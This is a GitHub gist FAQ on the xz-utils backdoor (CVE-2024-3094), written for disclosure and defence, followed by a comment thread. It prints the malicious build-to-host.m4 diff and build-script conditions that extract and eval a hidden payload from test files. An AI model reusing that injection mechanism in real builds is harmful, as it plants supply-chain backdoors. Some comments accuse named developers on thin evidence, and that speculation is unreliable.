@thesamesam
Last active April 30, 2024 13:31
xz-utils backdoor situation (CVE-2024-3094)

FAQ on the xz-utils backdoor (CVE-2024-3094)

This is a living document. Everything in it is written in good faith and is accurate to the best of our knowledge, but we don't yet know everything about what's going on.

Background

On March 29th, 2024, a backdoor was discovered in xz-utils, a suite of software that gives developers lossless compression. This package is commonly used for compressing release tarballs, software packages, kernel images, and initramfs images. It is very widely distributed; your average Linux or macOS system will most likely have it installed for convenience.

This backdoor is very indirect and only shows up when a few known specific criteria are met. Others may yet be discovered! However, this backdoor is at least triggerable by remote unprivileged systems connecting to public SSH ports. This has been seen in the wild, where it gets activated by connections and results in performance issues, but we do not yet know what is required to bypass authentication (etc.) with it.

We're reasonably sure the following things need to be true for your system to be vulnerable:

  • You need to be running a distro that uses glibc (for IFUNC)
  • You need to have versions 5.6.0 or 5.6.1 of xz or liblzma installed (xz-utils provides the library liblzma) - likely only true if running a rolling-release distro and updating religiously.

We know that the combination of systemd and patched openssh is vulnerable, but pending further analysis of the payload, we cannot be certain that other configurations aren't.

While not scaremongering, it is important to be clear that at this stage, we got lucky, and there may well be other effects of the infected liblzma.

If you're running a publicly accessible sshd, then you are - as a rule of thumb for those not wanting to read the rest here - likely vulnerable.

If you aren't, it is unknown for now, but you should update as quickly as possible because investigations are continuing.

TL;DR:

  • Using a .deb or .rpm based distro with glibc and xz-5.6.0 or xz-5.6.1:
    • Using systemd on publicly accessible ssh: update RIGHT NOW NOW NOW
    • Otherwise: update RIGHT NOW NOW but prioritize the former
  • Using another type of distribution:
    • With glibc and xz-5.6.0 or xz-5.6.1: update RIGHT NOW, but prioritize the above.

If all of these are the case, please update your systems to mitigate this threat. For more information about affected systems and how to update, please see this article or check the xz-utils page on Repology.
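
As a rough aid for the version criterion above, the sketch below classifies an upstream version string. The function name `classify_xz_version` is made up for illustration, and it only recognises plain upstream versions; distro package versions with suffixes or epochs would need their own handling.

```sh
#!/bin/sh
# classify_xz_version is a hypothetical helper, not part of xz-utils.
# It prints "affected" for the two releases known to carry the backdoor
# (5.6.0 and 5.6.1) and "not-known-affected" for anything else.
classify_xz_version() {
    case "$1" in
        5.6.0|5.6.1) echo "affected" ;;
        *)           echo "not-known-affected" ;;
    esac
}

classify_xz_version 5.6.1   # prints: affected
classify_xz_version 5.4.6   # prints: not-known-affected
```

On a live system the input could come from the first line of `xz --version`, for example `classify_xz_version "$(xz --version | awk 'NR==1 {print $NF}')"`; treat that extraction as an assumption about the output format rather than a guaranteed interface.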

This is not a fault of sshd, systemd, or glibc; that is just how it was made exploitable.

Design

This backdoor has several components. At a high level:

  • The release tarballs upstream publishes don't have the same code that GitHub has. This is common in C projects so that downstream consumers don't need to remember how to run autotools and autoconf. The version of build-to-host.m4 in the release tarballs differs wildly from the upstream on GitHub.
  • There are crafted test files in the tests/ folder within the git repository too. These files are in the following commits:
  • Note that the bad commits have since been reverted in e93e13c8b3bec925c56e0c0b675d8000a0f7f754
  • A script called by build-to-host.m4 that unpacks this malicious test data and uses it to modify the build process.
  • IFUNC, a mechanism in glibc that allows for indirect function calls, is used to perform runtime hooking/redirection of OpenSSH's authentication routines. IFUNC is a tool that is normally used for legitimate things, but in this case it is exploited for this attack path.

Normally upstream publishes release tarballs that are different than the automatically generated ones in GitHub. In these modified tarballs, a malicious version of build-to-host.m4 is included to execute a script during the build process.

This script (at least in versions 5.6.0 and 5.6.1) checks for various conditions like the architecture of the machine. Here is a snippet of the malicious script that gets unpacked by build-to-host.m4 and an explanation of what it does:

if ! (echo "$build" | grep -Eq "^x86_64" > /dev/null 2>&1) && (echo "$build" | grep -Eq "linux-gnu$" > /dev/null 2>&1);then

  • If amd64/x86_64 is the target of the build
  • And if the target uses the name linux-gnu (mostly checks for the use of glibc)
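
The two bullets can be restated as a small standalone check. This is a sketch of the condition as described above, reusing the two grep patterns from the snippet; it is not a copy of the malicious script's control flow, and the function name `is_targeted_build` is invented for illustration.

```sh
#!/bin/sh
# is_targeted_build TRIPLET
# Succeeds (exit status 0) when the build triplet starts with x86_64
# and ends with linux-gnu, i.e. both conditions in the bullets hold.
# Hypothetical helper for illustration only.
is_targeted_build() {
    echo "$1" | grep -Eq "^x86_64" || return 1
    echo "$1" | grep -Eq "linux-gnu$" || return 1
    return 0
}

for triplet in x86_64-pc-linux-gnu aarch64-unknown-linux-gnu x86_64-pc-linux-musl; do
    if is_targeted_build "$triplet"; then
        echo "$triplet: matches"
    else
        echo "$triplet: does not match"
    fi
done
```

Only the first of the three sample triplets matches: the second fails the architecture test and the third fails the `linux-gnu` suffix test.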

It also checks for the toolchain being used:

  if test "x$GCC" != 'xyes' > /dev/null 2>&1;then
  exit 0
  fi
  if test "x$CC" != 'xgcc' > /dev/null 2>&1;then
  exit 0
  fi
  LDv=$LD" -v"
  if ! $LDv 2>&1 | grep -qs 'GNU ld' > /dev/null 2>&1;then
  exit 0
  fi

And if you are trying to build a Debian or Red Hat package:

if test -f "$srcdir/debian/rules" || test "x$RPM_ARCH" = "xx86_64";then

This attack thus seems to be targeted at amd64 systems running glibc using either Debian or Red Hat derived distributions. Other systems may be vulnerable as well, but at this time we don't know.
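
The packaging test quoted above is easy to reproduce in isolation. The sketch below wraps the same two `test` expressions in a function that takes the source directory and the value of `RPM_ARCH` as arguments; the name `looks_like_package_build` and the argument passing are assumptions made for illustration.

```sh
#!/bin/sh
# looks_like_package_build SRCDIR RPM_ARCH
# Succeeds when SRCDIR contains debian/rules (a Debian package build)
# or when RPM_ARCH equals x86_64 (an RPM build for that architecture).
# Hypothetical helper for illustration only.
looks_like_package_build() {
    test -f "$1/debian/rules" || test "x$2" = "xx86_64"
}

# Demonstration in a throwaway directory.
demo=$(mktemp -d)
looks_like_package_build "$demo" "" || echo "plain build: no match"
mkdir -p "$demo/debian" && : > "$demo/debian/rules"
looks_like_package_build "$demo" "" && echo "debian/rules present: match"
rm -rf "$demo"
```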

Lasse Collin, the original long-standing xz maintainer, is currently working on auditing the xz.git.

Design specifics

$ git diff m4/build-to-host.m4 ~/data/xz/xz-5.6.1/m4/build-to-host.m4
diff --git a/m4/build-to-host.m4 b/home/sam/data/xz/xz-5.6.1/m4/build-to-host.m4
index f928e9ab..d5ec3153 100644
--- a/m4/build-to-host.m4
+++ b/home/sam/data/xz/xz-5.6.1/m4/build-to-host.m4
@@ -1,4 +1,4 @@
-# build-to-host.m4 serial 3
+# build-to-host.m4 serial 30
 dnl Copyright (C) 2023-2024 Free Software Foundation, Inc.
 dnl This file is free software; the Free Software Foundation
 dnl gives unlimited permission to copy and/or distribute it,
@@ -37,6 +37,7 @@ AC_DEFUN([gl_BUILD_TO_HOST],
 
   dnl Define somedir_c.
   gl_final_[$1]="$[$1]"
+  gl_[$1]_prefix=`echo $gl_am_configmake | sed "s/.*\.//g"`
   dnl Translate it from build syntax to host syntax.
   case "$build_os" in
     cygwin*)
@@ -58,14 +59,40 @@ AC_DEFUN([gl_BUILD_TO_HOST],
   if test "$[$1]_c_make" = '\"'"${gl_final_[$1]}"'\"'; then
     [$1]_c_make='\"$([$1])\"'
   fi
+  if test "x$gl_am_configmake" != "x"; then
+    gl_[$1]_config='sed \"r\n\" $gl_am_configmake | eval $gl_path_map | $gl_[$1]_prefix -d 2>/dev/null'
+  else
+    gl_[$1]_config=''
+  fi
+  _LT_TAGDECL([], [gl_path_map], [2])dnl
+  _LT_TAGDECL([], [gl_[$1]_prefix], [2])dnl
+  _LT_TAGDECL([], [gl_am_configmake], [2])dnl
+  _LT_TAGDECL([], [[$1]_c_make], [2])dnl
+  _LT_TAGDECL([], [gl_[$1]_config], [2])dnl
   AC_SUBST([$1_c_make])
+
+  dnl If the host conversion code has been placed in $gl_config_gt,
+  dnl instead of duplicating it all over again into config.status,
+  dnl then we will have config.status run $gl_config_gt later, so it
+  dnl needs to know what name is stored there:
+  AC_CONFIG_COMMANDS([build-to-host], [eval $gl_config_gt | $SHELL 2>/dev/null], [gl_config_gt="eval \$gl_[$1]_config"])
 ])
 
 dnl Some initializations for gl_BUILD_TO_HOST.
 AC_DEFUN([gl_BUILD_TO_HOST_INIT],
 [
+  dnl Search for Automake-defined pkg* macros, in the order
+  dnl listed in the Automake 1.10a+ documentation.
+  gl_am_configmake=`grep -aErls "#{4}[[:alnum:]]{5}#{4}$" $srcdir/ 2>/dev/null`
+  if test -n "$gl_am_configmake"; then
+    HAVE_PKG_CONFIGMAKE=1
+  else
+    HAVE_PKG_CONFIGMAKE=0
+  fi
+
   gl_sed_double_backslashes='s/\\/\\\\/g'
   gl_sed_escape_doublequotes='s/"/\\"/g'
+  gl_path_map='tr "\t \-_" " \t_\-"'
 changequote(,)dnl
   gl_sed_escape_for_make_1="s,\\([ \"&'();<>\\\\\`|]\\),\\\\\\1,g"
 changequote([,])dnl
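
Two pieces of the diff are easier to follow when run on harmless data: the `grep` in `gl_BUILD_TO_HOST_INIT` that locates a file by a trailing marker, and the `tr` call stored in `gl_path_map` that swaps bytes before decompression. The sketch below reproduces both on made-up input. The function names are invented, the marker text is a placeholder, and the `tr` sets are reordered (same mapping, with the hyphen placed where it cannot be read as a range) as a portability assumption.

```sh
#!/bin/sh
# find_marker_files DIR
# Lists files under DIR containing a line that ends with four '#',
# five alphanumerics, four '#': the same extended regex as in the diff.
find_marker_files() {
    grep -aErls "#{4}[[:alnum:]]{5}#{4}$" "$1" 2>/dev/null
}

# swap_map: reads stdin, swaps tab<->space and '-'<->'_'.
# Same mapping as gl_path_map='tr "\t \-_" " \t_\-"' in the diff.
swap_map() {
    tr -- '-\t _' '_ \t-'
}

demo=$(mktemp -d)
printf 'data\n####Abc12####\n' > "$demo/marked.bin"
printf 'nothing here\n' > "$demo/plain.txt"
find_marker_files "$demo"                # prints the path of marked.bin only
printf 'a-b_c\n' | swap_map              # prints a_b-c
printf 'a-b_c\n' | swap_map | swap_map   # applying it twice restores a-b_c
rm -rf "$demo"
```

Because the mapping is its own inverse, whoever prepared the hidden data could have used the very same `tr` call to scramble it.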

Payload

If those conditions are met, the payload is injected into the source tree. We have not analyzed this payload in detail. Here are the main things we know:

  • The payload activates if the running program has the process name /usr/sbin/sshd. Systems that put sshd in /usr/bin or another folder may or may not be vulnerable.

  • It may activate in other scenarios too, possibly even unrelated to ssh.

  • We don't entirely know what the payload is intended to do. We are investigating.

  • Successful exploitation does not generate any log entries.

  • Vanilla upstream OpenSSH isn't affected unless one of its dependencies links liblzma.

    • Lennart Poettering had mentioned that it may happen via pam->libselinux->liblzma, and possibly in other cases too, but...
    • libselinux does not link to liblzma. It turns out the confusion was because of an old downstream-only patch in Fedora and a stale dependency in the RPM spec which persisted long-beyond its removal.
    • PAM modules are loaded too late in the process AFAIK for this to work (another possible example was pam_fprintd). Solar Designer raised this issue as well on oss-security.
  • The payload is loaded into sshd indirectly. sshd is often patched to support systemd-notify so that other services can start when sshd is running. liblzma is loaded because it's depended on by other parts of libsystemd. This is not the fault of systemd; it is simply unfortunate. The patch that most distributions use is available here: openssh/openssh-portable#375.

    • Update: The OpenSSH developers have added non-library integration of the systemd-notify protocol so distributions won't be patching it in via libsystemd support anymore. This change has been committed and will land in OpenSSH-9.8, due around June/July 2024.
  • If this payload is loaded in openssh sshd, the RSA_public_decrypt function will be redirected into a malicious implementation. We have observed that this malicious implementation can be used to bypass authentication. Further research is being done to explain why.

    • Filippo Valsorda has shared analysis indicating that the attacker must supply a key which is verified by the payload and then attacker input is passed to system(), giving remote code execution (RCE).
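
Since the payload only reaches sshd when liblzma ends up in its process, one quick triage step is to look for liblzma among sshd's dynamic dependencies. The sketch below filters `ldd`-style output read from standard input; the function name `links_liblzma` is invented, and the sample lines are fabricated for illustration rather than captured from a real system.

```sh
#!/bin/sh
# links_liblzma: reads ldd-style output on stdin and succeeds
# (exit status 0) if any line mentions liblzma.
# Hypothetical helper for illustration only.
links_liblzma() {
    grep -q 'liblzma'
}

# Illustrative input only; the library paths below are made up.
sample='libsystemd.so.0 => /lib/x86_64-linux-gnu/libsystemd.so.0
liblzma.so.5 => /lib/x86_64-linux-gnu/liblzma.so.5
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6'

if printf '%s\n' "$sample" | links_liblzma; then
    echo "liblzma is in the dependency list"
else
    echo "liblzma not found"
fi
```

On a real machine the input would be something like `ldd "$(command -v sshd)" | links_liblzma`. A negative result only covers libraries resolved at load time, not anything opened later at runtime, and a positive result says nothing about which liblzma version is installed.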

Tangential xz bits

  • Jia Tan's 328c52da8a2bbb81307644efdb58db2c422d9ba7 commit contained a . in the CMake check for landlock sandboxing support. This caused the check to always fail so landlock support was detected as absent.

    • Hardening of CMake's check_c_source_compiles has been proposed (see Other projects).
  • IFUNC was introduced for crc64 in ee44863ae88e377a5df10db007ba9bfadde3d314 by Hans Jansen.

    • Hans Jansen later went on to ask Debian to update xz-utils in https://bugs.debian.org/1067708, but this is quite a common thing for eager users to do, so it's not necessarily nefarious.

People

We do not want to speculate on the people behind this project in this document. This is not a productive use of our time, and law enforcement will be able to handle identifying those responsible. They are likely patching their systems too.

xz-utils had two maintainers:

  • Lasse Collin (Larhzu) who has maintained xz since the beginning (~2009), and before that, lzma-utils.
  • Jia Tan (JiaT75) who started contributing to xz in the last 2-2.5 years and gained commit access, and then release manager rights, about 1.5 years ago. He was removed on 2024-03-31 as Lasse begins his long work ahead.

Lasse regularly has internet breaks and was on one of these as this all kicked off. He has posted an update at https://tukaani.org/xz-backdoor/ and is working with the community.

Please be patient with him as he gets up to speed and takes time to analyse the situation carefully.

Misc notes

Analysis of the payload

This is the part which is very much in flux. It's early days yet.

These two especially do a great job of analysing the initial/bash stages:

Other great resources:

Other projects

There are concerns that some other projects are affected (either by themselves, or because changes to other projects were made to facilitate the xz backdoor). I want to avoid a witch-hunt, but I'm listing some examples here which have already been linked widely, to give some commentary.

Tangential efforts as a result of this incident

This is for suggesting specific changes which are being considered as a result of this.

Discussions in the wake of this

This is for linking to interesting general discussions, rather than specific changes being suggested (see above).

Non-mailing list proposals:

Acknowledgements

  • Andres Freund who discovered the issue and reported it to linux-distros and then oss-security.
  • All the hard-working security teams helping to coordinate a response and push out fixes.
  • Xe Iaso who resummarized this page for readability.
  • Everybody who has provided me tips privately, in #tukaani, or in comments on this gist.

Meta

Please try to keep comments on the gist constrained to editorial changes I need to make, new sources, etc.

There are various places to theorise & such, please see e.g. https://discord.gg/TPz7gBEE (for both reverse engineering and OSINT). (I'm not associated with that Discord but the link is going around, so...)

Response to questions

  • A few people have asked why Jia Tan followed me (@thesamesam) on GitHub. #tukaani was a small community on IRC before this kicked off (~10 people, currently has ~350). I've been in #tukaani for a few years now. When the move from self-hosted infra to github was being planned and implemented, I was around and starred & followed the new Tukaani org pretty quickly.

  • I'm referenced in one of the commits in the original oss-security post that works around noise from the IFUNC resolver. This was a legitimate issue which applies to IFUNC resolvers in general. The GCC bug it led to (PR114115) has been fixed.

    • On reflection, there may have been a missed opportunity as maybe I should have looked into why I couldn't hit the reported Valgrind problems from Fedora on Gentoo, but this isn't the place for my own reflections nor is it IMO the time yet.

TODO for this doc

  • Add a table of releases + signer?
  • Include the injection script after the macro
  • Mention detection?
  • Explain the bug-autoconf thing maybe wrt serial
  • Explain dist tarballs, why we use them, what they do, link to autotools docs, etc
    • "Explaining the history of it would be very helpful I think. It also explains how a single person was able to insert code in an open source project that no one was able to peer review. It is pragmatically impossible, even if technically possible once you know the problem is there, to peer review a tarball prepared in this manner."

TODO overall

Anyone can and should work on these. I'm just listing them so people have a rough idea of what's left.

  • Ensuring Lasse Collin and xz-utils is supported, even long after the fervour is over
  • Reverse engineering the payload (it's still fairly early days here on this)
    • Once finished, tell people whether:
      • the backdoor did anything other than wait for connections for RCE, like:
        • call home (send found private keys, etc)
        • load/execute additional rogue code
        • did some other steps to infest the system (like adding users, authorized_keys, etc.) or whether it can be certainly said, that it didn't do so
      • other attack vectors than via sshd were possible
      • whether people (who had the compromised versions) can feel fully safe if they either had sshd not running OR at least not publicly accessible (e.g. because it was behind a firewall, nat, iptables, etc.)
  • Auditing all possibly-tainted xz-utils commits
  • Investigate other paths for sshd to get liblzma in its process (not just via libsystemd, or at least not directly)
    • This is already partly done and it looks like none exist, but it would be nice to be sure.
  • Checking other projects for similar injection mechanisms (e.g. similar build system lines)
  • Diff and review all "golden" upstream tarballs used by distros against the output of creating a tarball from the git tag for all packages.
  • Check other projects which (recently) introduced IFUNC, as suggested by thegrugq.
    • This isn't a bad idea even outside of potential backdoors, given how brittle IFUNC is.
  • ???
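
The tarball-versus-git comparison in the list above can be prototyped with standard tools. The sketch below assumes both trees are already on disk (one exported from the git tag, one unpacked from the release tarball) and simply reports what differs; the function name and the directory layout are hypothetical. Autotools release tarballs legitimately contain generated files that are absent from git, so every reported difference still needs human review.

```sh
#!/bin/sh
# compare_trees GIT_EXPORT_DIR TARBALL_DIR
# Prints files that differ or exist on only one side.
# Exit status follows diff: 0 = identical, 1 = differences found.
# Hypothetical helper for illustration only.
compare_trees() {
    LC_ALL=C diff -rq "$1" "$2"
}

demo=$(mktemp -d)
mkdir -p "$demo/git/m4" "$demo/tarball/m4"
echo 'same' > "$demo/git/configure.ac"
echo 'same' > "$demo/tarball/configure.ac"
echo 'serial 30' > "$demo/tarball/m4/build-to-host.m4"   # only in the tarball
compare_trees "$demo/git" "$demo/tarball" || echo "trees differ, review the list above"
rm -rf "$demo"
```

The git side could be produced with `git archive` for the release tag; how each distro obtains and unpacks its tarball is left as an assumption here.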

References and other reading material

@Z-nonymous

Z-nonymous commented Mar 30, 2024

Guys, I know we can't read PRs anymore in xz repo, but as I said earlier this PR tukaani-project/xz#86 was about actor JiaT75 coordinating with actor xry111 to further like "completely fasten CRC manytimesfold".

Maybe the code in that particular PR is legit, BUT:

As per Andres Freund's original discovery, this exploit makes use of the CRC routines. Also, the same xry111 previously contributed to openssl (approving and reviewing PRs from others), and SSH is involved in the backdoor.

That actor is involved in many PRs, commits, and reviews in openssl, systemd, protobuf-c, llvm, util-linux, torvalds/linux, make-ca, cpython, curl, libxcrypt, dosbox-x, rust...
16 repo contributed to this year, 47 repos in 2023, 38 in 2024.
Some of his PRs are reviewed in conjunction with xen0n or xry111 is reviewing PRs from him. xen0n has contributed 36 repos this year, 101 in 2023 and 136 in 2024.

They are participating in adding support for the "Loongson Chinese architecture", so that might explain their wide contributions, but everyone in their group https://github.com/loongson-community is accessing a large number of key open source projects.
Overall they cover such a wide number of open source projects, rust, nodejs, mozilla repos...

I'm not saying all PRs are suspicious, but certainly an actor can coordinate between these components to push a few changes here and there to create a sophisticated exploit like the one shown here.

It's a Loong stretch, but Linux is powering something like $400-500B of Cloud/SaaS revenue, not counting all the standalone servers out there, all of that powering a large portion of the world's economy; so a motivated bad actor can definitely afford to spend a couple of years on good contributions to obfuscate and backdoor Linux.

The sophistication of the current attack is an indicator that all packages these folks contributed to need a complete review of all their PRs and commits.

thanks @ozars for this link:
https://play.clickhouse.com/play?user=play#U0VMRUNUICogRlJPTSBnaXRodWJfZXZlbnRzIFdIRVJFIGFjdG9yX2xvZ2luPSd4cnkxMTEnIE9SREVSIEJZIGZpbGVfdGltZSBERVND

Using SELECT DISTINCT repo_name FROM github_events WHERE actor_login='xry111' ORDER BY file_time DESC

in the above will help assess how much core Linux code is impacted by this actor/group (a lot).

Please comment on this, am I hallucinating? This is a serious concern.
All original official projects this group touched need a complete review of the group's contributions to their code. If you know them, please get their feedback on the topic.

Coordinated changes to the kernel, build tools, core daemons, libraries, and drivers are definitely possible for a motivated threat actor after gaining trust through legit contributions by many different accounts over the course of many years.

@Z-nonymous

Z-nonymous commented Mar 30, 2024

Ah, waking up only to see this xz drama, and with myself somehow "involved"... I've just checked my boxes and they aren't affected, so let me provide some info from my perspective.

For the record, I know this xry111 guy and have met him in person last year, so I can at least confirm his identity is real and that he is actually doing the porting work. Either I'm being deceived as well, or maybe it's just unfortunate similarity in activity patterns after all; one can only know by actually reviewing the code.

As for the potential link to Loongson/LoongArch, I deliberately avoid getting into affiliation with Loongson, and haven't signed any NDA with them. AFAIK xry111 is also unaffiliated. We're mostly just doing trivial arch enablement here and there, fixing build errors, fixing modern C compatibility, all the daily packager stuff, and only occasionally going deeper than that. And from my experience, most of the arch-specific, or LoongArch-specific changes, would be guarded by #ifdef's or reside in separate files, and would never get built on other more popular arches.

Hope that's helpful in clearing some of the confusion or suspicion; I know I'm one of the people being suspected here though, so if that's the case, maybe read the code and reach your own conclusion. (And I'm not being defensive by replying with this; don't take this to be personal if I sound strange by not being a native speaker of English.)

Thanks for replying, I'm sorry if I'm overstretching this and you are innocent. My second post arrived in the mean time. We need all original project maintainers to review all your group's contributions as some legit contributions might have been used to obfuscate other backdoor-allowing code in systemd, llvm, make, openssl...

I was already suspicious seeing none of your group are actual official employees of Loongson.

@Artoria2e5

Artoria2e5 commented Mar 30, 2024

I simply love it when people start connecting weird-ahh lines.

Look Mr Z-nonymous, I've met with at least 3 of the people on your screenshot, maybe even more but I'm terrible with faces. Felix Yan even signed my lost PGP key 222d7bda before a LUG meet many years ago. You're accusing people with real identification cards and faces and online names from the shadow of anonymity.

You better not bother my fat cat-avatar friend.

I was already suspicious seeing none of your group are actual official employees of Loongson.

If you know, you know. The Loongson people are terrible at writing documentation for the fancy features they bloat about (or according to their insiders, terrible at getting their legal or whatever departments to approve the public release of documentation; "you can win a competition and sign an NDA to get it!"). Their hardware is new, curious, and not cheap. Some people buy one and just spend forever trying to make it run a GBA emulator faster. It's basically Alcoholics Anonymous, but for people who spend 500+ dollars on a weird computer.

@Z-nonymous

I simply love it when people start connecting weird-ahh lines.

Look Mr Z-nonymous, I've met with at least 3 of the people on your screenshot, maybe even more but I'm terrible with faces. Felix Yan even signed my lost PGP key 222d7bda before a LUG meet many years ago. You're accusing people with real identification cards and faces and online names from the shadow of anonymity.

You better not bother my fat cat-avatar friend.

I was already suspicious seeing none of your group are actual official employees of Loongson.

If you know, you know. The Loongson people are terrible at writing documentation for the fancy features they bloat about (or according to their insiders, terrible at getting their legal or whatever departments to approve the public release of documentation; "you can win a competition and sign an NDA to get it!"). Their hardware is new, curious, and not cheap. Some people buy one and just spend forever trying to make it run a GBA emulator faster. It's basically Alcoholics Anonymous, but for people who spend 500+ dollars on a weird computer.

Again, sorry if I'm overstretching; I'd love to be wrong.

Again: coordinated CRC, systemd, and SSL changes that are exploited by this backdoor payload. Hundreds of billions of potential ransomware dollars.
I'm not buying anything other than the original code maintainers of the touched repos validating all of that group's contributions.

I'm not disclosing my identity because it's not needed to participate in GitHub, which is why such an elaborate attack is possible.

@lhmouse

lhmouse commented Mar 30, 2024

Yeah, China! China! When something involves a random Chinese, it always unfolds with accusation out of thin air.

@Artoria2e5

Artoria2e5 commented Mar 30, 2024

Shall we look at the things you linked to then?

CRC: loongarch isn’t even being attacked here. Changing to that specialized implementation on a not-x86 architecture has no effect on x86-64, which is our target.

Systemd: what do you expect removing the "pure" attribute to do? It does not cause systemd to load liblzma if it previously did not, that I know.

SSL warning: it’s not even a security warning, it’s an annoying usage warning from OpenSSL. Command-line OpenSSL.

@Z-nonymous

That sounds like a dangerous slippery slope stemming from confirmation bias. I suggest focusing on processes, not on people, and especially avoiding inflammatory language.

Thanks, I'll stop there. I know maintainers of a lot of these projects are overworked, sometimes it's a side project, and they welcome contributors. Lasse seems to be the example, with emails explaining he has trouble continuing to maintain the project while people pressure him for updates.

I just want all of these projects' original owners to understand the potential bigger issue that needs reviewing. This is a highly sophisticated attack involving CRC, SSL, systemd, and make. I hope forensics get to the full explanation, but the whole critical path needed to get such a backdoor in stealthily is touched by this group of enthusiasts.

I'm also saying I could be wrong, but this needs thorough investigation.
On an OS that is powering almost every server and containers out there. Backdoor root access.

@taoky

taoky commented Mar 30, 2024

https://web.archive.org/web/20240329180818/https://github.com/tukaani-project/xz/pull/86

The attacker only participates in reviewing the pull request (and it's the only open PR in xz repo at that time). Please stop making unreasonable accusations towards innocent developers.

@Z-nonymous

Yeah, China! China! When something involves a random Chinese, it always unfolds with accusation out of thin air.

Idiot.

I don't say it's China; imagine the benefit to a proprietary OS if Linux is compromised.
It could be US criminals pretending to be from China.

I did not accuse China in any case, I just pointed at a group that is pretending to add support for a Chinese CPU when they are not the product's official representatives. So it could even be a simple stateless agent.

@erinacio

Everyone, if you think any repo that could be affected needs a security audit, please open issues there asking for that, or simply contact the maintainers in person. There's no reason for advocating witch-hunting here. Please stop accusing others with vague evidence.

@Fearyncess

Yeah, China! China! When something involves a random Chinese, it always unfolds with accusation out of thin air.

Idiot.

I don't say it's China; imagine the benefit to a proprietary OS if Linux is compromised. It could be US criminals pretending to be from China.

I did not accuse China in any case, I just pointed at a group that is pretending to add support for a Chinese CPU when they are not the product's official representatives. So it could even be a simple stateless agent.

[image: "Talk is cheap. Show me the code." (Linus Torvalds)]

@MingcongBai

MingcongBai commented Mar 30, 2024

Yeah, China! China! When something involves a random Chinese, it always unfolds with accusation out of thin air.

Idiot.

I don't say it's China; imagine the benefit to a proprietary OS if Linux is compromised. It could be US criminals pretending to be from China.

I did not accuse China in any case, I just pointed at a group that is pretending to add support for a Chinese CPU when they are not the product's official representatives. So it could even be a simple stateless agent.

Eh.

Look dude, I'd be more careful with this kind of accusation. It's more than a little funny seeing you mention my name and then invalidating all of our (can friendship and passion not exist in China) work. How dare you.

Go, look me up and rest assured that you will be disappointed.

It's normal to be anxious or at least a little nervous about the aftermath of this drama, but I'd follow the advice from @erinacio and @xen0n and submit requests for audit in any number of projects you see fit. This is the only way forward that does not bring doom to open source collaboration and this international community that we have worked so hard to build (and, in case you're wondering about what we do, to convince employees and management at Loongson that an open and community-friendly policy is the way forward).

If you still believe in this, please don't disappoint.

EDIT: Grammatical fixes, you know, not my native tongue.

@mrbbbaixue

mrbbbaixue commented Mar 30, 2024

From the perspective of Loongson Company, there is no reason for them to extensively modify the fundamental components of Linux merely to add a backdoor.
Maybe we should just stop accusing a specific country or company, and just focus on the person who wrote this and how to stop it.

@vtorri

vtorri commented Mar 30, 2024

kill the autotools, use meson (the philosophy of meson is: only what is in git should go to the dist; there is not even a need for a release, just a tag)

@DanielRuf

relevant xkcd: https://xkcd.com/2347/

We had such cases before that in the npmjs ecosystem (and also PyPI).
Besides that, please everyone stick to the facts.

@herzeleid02 so far there is no active exploitation known. The installed version doesn't imply that you are truly affected - just that the version with the malicious test files and code is loaded. For the execution there are multiple requirements to be successful. Currently no one knows all, the list is just what Andres Freund found out.

We got very lucky, because the performance regression was quickly detected and the code analyzed. I doubt that logging could be bypassed with this backdoor, so looking at the logs may show you if anything relevant happened. But personally I think that nothing happened because the cover has been blown now, and if any threat actor exploited this on a large scale now, everyone would see it.

In the security world, you don't want to burn your exploits like this. Since this was planned by the involved person(s) for more than 2 years and the backdoor gradually implemented (probably to not get caught directly), there was probably some specific target (I guess not all of us) which is probably harder to hit (and so they took the long and complex route to obfuscate that as much as possible).

These are just my assumptions based on my experience in the field of cyber warfare, APTs and tactics involved in such things. The best way to hide something, is in plain sight. That also reminds me of bigger espionage cases.

@FlyGoat

FlyGoat commented Mar 30, 2024

Ah, waking up only to see this xz drama, and with myself somehow "involved"... I've just checked my boxes and they aren't affected, so let me provide some info from my perspective.
For the record, I know this xry111 guy and have met him in person last year, so I can at least confirm his identity is real and that he is actually doing the porting work. Either I'm being deceived as well, or maybe it's just unfortunate similarity in activity patterns after all; one can only know by actually reviewing the code.
As for the potential link to Loongson/LoongArch, I deliberately avoid getting into affiliation with Loongson, and haven't signed any NDA with them. AFAIK xry111 is also unaffiliated. We're mostly just doing trivial arch enablement here and there, fixing build errors, fixing modern C compatibility, all the daily packager stuff, and only occasionally going deeper than that. And from my experience, most of the arch-specific, or LoongArch-specific changes, would be guarded by #ifdef's or reside in separate files, and would never get built on other more popular arches.
Hope that's helpful in clearing some of the confusion or suspicion; I know I'm one of the people being suspected here though, so if that's the case, maybe read the code and reach your own conclusion. (And I'm not being defensive by replying with this; don't take this to be personal if I sound strange by not being a native speaker of English.)

Thanks for replying, I'm sorry if I'm overstretching this and you are innocent. My second post arrived in the mean time. We need all original project maintainers to review all your group's contributions as some legit contributions might have been used to obfuscate other backdoor-allowing code in systemd, llvm, make, openssl...

I was already suspicious seeing none of your group are actual official employees of Loongson.

In your theory Linux could not exist because Linus was not an official employee of Intel.

Speaking for myself, supporting niche architectures in various FOSS projects has been my hobby for years. If you wish to check my identity, please go ahead, you'll find nothing more than an ordinary uni student trying to waste spare time on random stuff.

@schkwve

schkwve commented Mar 30, 2024

but I'd follow the advice from @erinacio and @xen0n and submit requests for audit in any number of projects you see fit

How do these security audits work? I've never heard of security audits in OSS before.

@FlyGoat

FlyGoat commented Mar 30, 2024

@DanielRuf

How do these security audits work? I've never heard of security audits in OSS before.

@schkwve there are. For example the company Cure53 does such things. Also OpenSSL got audited multiple times:
https://duckduckgo.com/?t=ffab&q=cure53+security+audit+opensource&ia=web
https://duckduckgo.com/?q=openssl+security+audit&t=ffab&ia=web

Basically they read the code, run checks against the library (do some pentesting) and provide feedback based on the results.

Even the OpenSSF and Google sponsor security audits:
https://duckduckgo.com/?t=ffab&q=openssf+security+audit&ia=web

If you look for more details around this, you will find more details for sure.

@erinacio

but I'd follow the advice from @erinacio and @xen0n and submit requests for audit in any number of projects you see fit

How do these security audits work? I've never heard of security audits in OSS before.

Security audits are more common in crypto or security related repos. Take gocryptfs as an example: https://defuse.ca/audits/gocryptfs.htm .

Informal audits could be done just by manually reviewing all commits, I think, but formal audits may require hiring security consultants. Many potentially affected repos are backed by big corps like Red Hat (taking systemd as an example). They must know the right people to contact to perform a security audit.

@herzeleid02

herzeleid02 commented Mar 30, 2024

relevant xkcd: https://xkcd.com/2347/

We had such cases before in the npmjs ecosystem (and also PyPI). Besides that, please everyone stick to the facts.

